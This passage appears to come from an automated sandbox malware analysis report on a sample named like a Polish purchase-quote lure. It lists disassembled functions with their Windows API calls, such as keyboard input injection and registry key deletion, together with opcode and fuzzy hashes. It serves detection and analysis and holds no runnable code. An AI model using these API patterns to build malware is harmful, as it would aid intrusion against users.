                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                      • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                      • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                      • API String ID: 1795658109-438819550
                                                                                                                                                                                                                                                      • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                      • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0042CD00
                                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,004A7D14,?,004A7D14,004A8E80,004A7D14,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                        • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                                                                                                                                        • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                                                                                                                                        • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                                                                                                                                        • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                                                                                      • String ID: $OH$@OH$X
                                                                                                                                                                                                                                                      • API String ID: 3491138722-1394974532
                                                                                                                                                                                                                                                      • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                      • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                                                                                                                                      • SendInput.USER32 ref: 0044C509
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3031425849-0
                                                                                                                                                                                                                                                      • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                      • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2095303065-0
                                                                                                                                                                                                                                                      • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                      • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                                                                                                      • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                      • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0044955A
                                                                                                                                                                                                                                                        • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1843234404-0
                                                                                                                                                                                                                                                      • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                      • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                      • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2338827641-0
                                                                                                                                                                                                                                                      • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                      • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 004175AE
                                                                                                                                                                                                                                                        • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                        • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 004175DE
                                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02F22D48), ref: 00417626
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                                                                                                      • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                      • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4023252218-0
                                                                                                                                                                                                                                                      • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                      • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                                      • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                      • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
